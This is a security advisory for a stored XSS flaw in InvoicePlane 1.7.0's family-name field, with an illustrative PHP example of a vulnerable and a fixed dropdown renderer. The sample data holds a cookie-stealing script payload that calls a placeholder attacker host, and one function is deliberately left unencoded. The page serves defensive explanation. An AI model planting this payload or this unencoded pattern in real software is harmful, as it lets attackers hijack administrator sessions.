InvoicePlane 1.7.0: Malicious Names Can Harm Admins
CVE-2026-25594
Summary
InvoicePlane 1.7.0 contains a stored cross-site scripting (XSS) flaw in the Family Name field. The stored `family_name` value is written into the family dropdown on the product form without HTML encoding, so an administrator who creates a family with a crafted name plants script that runs in the browser of every administrator who later opens the product form. Version 1.7.1 fixes the issue; update to InvoicePlane 1.7.1 or later.
What to do
Update to InvoicePlane 1.7.1 or later, the version the advisory lists as patched. Exploitation requires the ability to create a family, which the advisory attributes to an administrator account, so the practical risk is one administrator (or a compromised administrator session) attacking other administrators. After upgrading, review existing family names for HTML or script markup: a stored payload survives the upgrade, and its presence means the field has already been abused.
Affected software
| Vendor | Product | Affected versions | Fix available |
|---|---|---|---|
| invoiceplane | invoiceplane | 1.7.0 | 1.7.1 |
Original description
InvoicePlane is a self-hosted open source application for managing invoices, clients, and payments. A Stored Cross-Site Scripting (XSS) vulnerability exists in InvoicePlane 1.7.0 via the Family Name field. The `family_name` value is rendered without HTML encoding inside the family dropdown on the product form. When an administrator creates a family with a malicious name, the payload executes in the browser of any administrator who visits the product form. Version 1.7.1 patches the issue.
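The description above names the root cause precisely: a stored value is interpolated into an `<option>` element with no output encoding. The following PHP (InvoicePlane 1.x is a PHP/CodeIgniter 3 application) is an added example written for this page, not InvoicePlane's own template code. It models the family dropdown twice, once echoing `family_name` raw as the advisory describes and once HTML-encoding it, and includes a small helper that flags stored names containing markup. The `$families` rows, the attacker host `attacker.example` and all function names are constructed for the illustration.

```php
<?php
// Added example, not InvoicePlane's own code. Models the product-form family
// dropdown and shows why an unencoded family_name becomes stored XSS.

// Constructed sample rows, shaped like a model result. Row 2 is the kind of
// family name the advisory describes: it closes the <option> and <select>
// elements and injects a script that exfiltrates the viewing admin's cookie.
// (attacker.example is a placeholder host.)
const SAMPLE_FAMILIES = [
    ['family_id' => 1, 'family_name' => 'Hardware'],
    ['family_id' => 2, 'family_name' =>
        '</option></select><script>fetch("//attacker.example/?c="+document.cookie)</script>'],
];

// VULNERABLE: family_name is concatenated straight into the HTML. Anything the
// stored value contains (tags, quotes, scripts) is sent to the browser as markup.
function render_family_dropdown_vulnerable(array $families): string
{
    $html = '<select name="family_id">';
    foreach ($families as $f) {
        $html .= '<option value="' . $f['family_id'] . '">' . $f['family_name'] . '</option>';
    }
    return $html . '</select>';
}

// Output encoder: encodes <, >, &, " and ' so a value can sit safely in an
// attribute or in element text. ENT_SUBSTITUTE keeps invalid UTF-8 from
// silently producing an empty string (which would hide the value rather than
// render it).
function e(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// FIXED: every dynamic value is encoded at the point it is written into HTML.
// The stored name is unchanged; the browser now sees the payload as literal text.
function render_family_dropdown_fixed(array $families): string
{
    $html = '<select name="family_id">';
    foreach ($families as $f) {
        $html .= '<option value="' . e((string) $f['family_id']) . '">'
               . e($f['family_name']) . '</option>';
    }
    return $html . '</select>';
}

// Post-upgrade check: a legitimate family name has no reason to contain HTML
// metacharacters. Returns the rows whose names look like planted markup so an
// operator can review them; the patch changes rendering, not stored data.
function suspicious_family_names(array $families): array
{
    return array_values(array_filter(
        $families,
        fn(array $f): bool => preg_match('/[<>"\']/', $f['family_name']) === 1
    ));
}

if (PHP_SAPI === 'cli' && realpath($argv[0] ?? '') === __FILE__) {
    echo "Vulnerable (script tag reaches the browser intact):\n";
    echo render_family_dropdown_vulnerable(SAMPLE_FAMILIES), "\n\n";
    echo "Fixed (payload is encoded, e.g. &lt;script&gt;):\n";
    echo render_family_dropdown_fixed(SAMPLE_FAMILIES), "\n\n";
    echo "Stored names that warrant review:\n";
    foreach (suspicious_family_names(SAMPLE_FAMILIES) as $f) {
        echo "  family_id={$f['family_id']}\n";
    }
}
```

In a CodeIgniter 3 view the same encoding is available as the framework's `html_escape()` helper, which wraps `htmlspecialchars()` in the same way; the point is that the escape happens at output, for every interpolated value, rather than relying on the admin who typed the name being trustworthy.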
NVD CVSS 3.1 base score: 4.8
Vulnerability type
CWE-79: Cross-site Scripting (XSS)
Published: 18 Feb 2026 · Updated: 11 Mar 2026 · First seen: 6 Mar 2026